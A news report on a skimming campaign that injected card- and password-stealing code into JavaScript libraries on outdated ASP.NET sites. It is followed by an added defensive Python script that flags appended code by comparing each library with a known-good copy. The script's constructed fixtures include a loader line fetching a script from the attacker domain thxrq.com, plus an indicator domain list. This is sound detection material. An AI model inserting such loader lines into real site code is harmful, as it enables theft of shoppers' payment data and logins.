Credit card skimmer preyed on old ASP.NET-powered websites with shopping carts

A credit card-skimming scheme tracked since April and targeting at least a dozen websites – all hosted on Microsoft IIS servers running the ASP.NET web application framework – counts among its victims sports organizations, health and community associations, and a credit union.

What they also have in common is that malicious code was injected into existing JavaScript libraries on each of the sites, according to new research from Malwarebytes, which discovered the campaign in the spring.

The hackers apparently exploited an old version of ASP.NET (4.0.30319) that Microsoft no longer supports and that is known to have vulnerabilities.

While not as popular as PHP, ASP.NET retains a sizable market share that includes smaller business websites and personal blogs that include an e-commerce component. Malwarebytes believes the skimming campaign likely began sometime in April 2020, as the first domain (hivnd[.]net) that is part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.

In a few instances, the skimmer was loaded remotely, explains Malwarebytes, providing a screenshot of a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.

The skimmer not only looks for credit card numbers but also passwords.
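
An added example, not code from Malwarebytes or the affected sites: because the malicious code was appended to legitimate libraries, comparing each deployed script with a known-good copy of the same version exposes the extra tail even when it is obfuscated and the remote domain is not visible. The sample library, the stand-in tails and the name `check_library` are constructed for illustration; the two domains are the indicators named in the article.

```python
import hashlib

# Indicators named in the article, kept defanged in source and refanged at run time.
IOC_DOMAINS = [d.replace("[.]", ".") for d in ("thxrq[.]com", "hivnd[.]net")]


def check_library(deployed: bytes, pristine: bytes) -> dict:
    """Compare a deployed JS library with a known-good copy of the same version."""
    report = {
        "sha256": hashlib.sha256(deployed).hexdigest(),
        "verdict": "clean",
        "appended": b"",
        # Plain-text indicator match; an obfuscated tail will not hit here.
        "ioc_hits": [d for d in IOC_DOMAINS if d.encode() in deployed.lower()],
    }
    if deployed == pristine:
        return report
    base = pristine.rstrip()  # ignore trailing-newline differences
    if deployed.startswith(base):
        # The original library is intact and something follows it.
        tail = deployed[len(base):].strip()
        report["verdict"] = "appended" if tail else "whitespace-only"
        report["appended"] = tail
    else:
        report["verdict"] = "modified"
    return report


# Constructed sample data (not taken from any real site or from the skimmer).
PRISTINE = b"/*! sample-lib 1.0 */\nfunction formatPrice(v){return v.toFixed(2);}\n"
LOADER_TAIL = (";/* constructed stand-in */loadScript('//" + IOC_DOMAINS[0]
               + "/element_main.js');\n").encode()
OBFUSCATED_TAIL = b";var _0x1a=['\\x63\\x6f\\x6e\\x73\\x74'];/* constructed stand-in */\n"

if __name__ == "__main__":
    for name, data in [("untouched", PRISTINE),
                       ("remote loader", PRISTINE + LOADER_TAIL),
                       ("obfuscated", PRISTINE + OBFUSCATED_TAIL),
                       ("edited", PRISTINE.replace(b"toFixed(2)", b"toFixed(3)"))]:
        r = check_library(data, PRISTINE)
        print(f"{name:14} {r['verdict']:16} iocs={r['ioc_hits']} tail={r['appended'][:40]!r}")
```

The indicator match only catches a tail that names the domain in clear text; the comparison against the known-good copy is what flags the obfuscated case.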
